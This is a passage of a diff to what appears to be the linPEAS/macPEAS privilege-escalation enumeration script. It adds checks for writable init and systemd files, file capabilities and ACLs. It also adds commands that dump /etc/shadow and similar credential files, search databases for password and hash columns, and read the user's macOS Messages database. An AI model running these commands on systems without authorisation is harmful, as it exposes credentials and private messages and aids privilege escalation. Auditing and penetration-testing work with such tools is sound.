grep IntFiles`" ]; then printf $ITALIC"/etc/ld.so.conf\n"$NC; cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" cat /etc/ld.so.conf 2>/dev/null | while read l; do - if [ "`echo \"$l\" | grep include`" ]; then - ini_path="`echo \"$l\" | cut -d " " -f 2`" - fpath="`dirname \"$ini_path\"`" - if [ "`find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find \"$fpath\" -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" for f in $fpath/*; do printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" @@ -2867,13 +3268,28 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" echo "" echo "Shell capabilities:" - (capsh --decode=0x"`cat \"/proc/$PPID/status\" 2>/dev/null | grep \"CapEff\" | awk '{print $2}'`" 2>/dev/null) || echo_not_found "capsh" + (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" echo "" echo "Files with capabilities (limited to 50):" getcap -r / 2>/dev/null | head -n 50 | while read cb; do - echo "$cb" | sed -${E} "s,$sudocapsB,${SED_RED}," | sed -${E} "s,$capsB,${SED_RED}," - if ! [ "$IAMROOT" ] && [ -w "`echo \"$cb\" | cut -d \" \" -f1`" ]; then + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi + + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," fi done @@ -2883,7 +3299,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then print_2title "Users with capabilities" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," else echo_not_found "/etc/security/capability.conf" fi echo "" @@ -2891,14 +3307,26 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Files with ACLs print_2title "Files with ACLs (limited to 50)" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ((getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + + if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + fi echo "" + ##-- IF) Files with ResourceFork + #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER + # print_2title "Files with ResourceFork" + # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" + # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" + #fi + #echo "" + ##-- IF) .sh files in PATH print_2title ".sh files in path" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" echo $PATH | tr ":" "\n" | while read d; do - for f in `find "$d" -name "*.sh" 2>/dev/null`; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do if ! [ "$IAMROOT" ] && [ -O "$f" ]; then echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) @@ -2910,6 +3338,11 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then done echo "" + if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications + fi + ##-- IF) Unexpected folders in / print_2title "Unexpected in root" if [ "$MACPEAS" ]; then @@ -2926,7 +3359,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "`find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi fi echo "" @@ -2935,25 +3368,25 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "`find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "`find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "`find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "`find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "`find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "`find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "`find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi fi echo "" ##-- IF) Hashes in passwd file print_list "Hashes inside passwd file? ........... " - if [ "`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi @@ -2967,16 +3400,24 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Credentials in fstab print_list "Credentials in fstab/mtab? ........... " - if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi ##-- IF) Read shadow files print_list "Can I read shadow files? ............. " - if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi + print_list "Can I read shadow plists? ............ " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + print_list "Can I write shadow plists? ........... " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + ##-- IF) Read opasswd file print_list "Can I read opasswd file? ............. " if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" @@ -2986,7 +3427,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) network-scripts print_list "Can I write in network-scripts? ...... " if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "`find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo_no fi @@ -2997,13 +3438,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Root files in home dirs print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${SED_RED},") || echo_not_found + (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found echo "" ##-- IF) Others files in my dirs if ! [ "$IAMROOT" ]; then print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" fi @@ -3024,13 +3465,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" logrotate --version 2>/dev/null || echo_not_found "logrotate" lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=`find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100` + logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && [ `echo "$log" | grep -E "$Wfolders"` ]; then #Only print info if something interesting found - if [ "`echo \"$log\" | grep \"You_can_write_more_log_files_inside_last_directory\"`" ]; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "`command -v logrotate 2>/dev/null`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; fi fi done @@ -3067,7 +3508,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Backup files print_2title "Backup files (limited 100)" - backs=`find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null` + backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) printf "%s\n" "$backs" | head -n 100 | while read b ; do if [ -r "$b" ]; then ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; @@ -3076,26 +3517,34 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then echo "" ##-- IF) DB files + if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + + fi print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="`command -v file 2>/dev/null`" + FILECMD="$(command -v file 2>/dev/null)" if [ "$PSTORAGE_DATABASE" ]; then printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if [ "$FILECMD" ]; then - echo "Found: `file \"$f\"`" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; else echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; fi done SQLITEPYTHON="" + echo "" printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && [ "`file \"$f\" | grep -i sqlite`" ]) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "`command -v sqlite3 2>/dev/null`" ]; then - tables=`sqlite3 $f ".tables" 2>/dev/null` + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "`command -v python 2>/dev/null`" ] || [ "`command -v python3 2>/dev/null`" ]; then - SQLITEPYTHON=`command -v python 2>/dev/null || command -v python3 2>/dev/null` - tables=`$SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null` + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" else tables="" @@ -3105,13 +3554,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then columns="" # Search for credentials inside the table using sqlite3 if [ -z "$SQLITEPYTHON" ]; then - columns=`sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE"` + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") # Search for credentials inside the table using python else - columns=`$SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null` + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) fi #Check found columns for interesting fields - INTCOLUMN=`echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt"` + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") if [ "$INTCOLUMN" ]; then printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" @@ -3125,6 +3574,11 @@ if [ 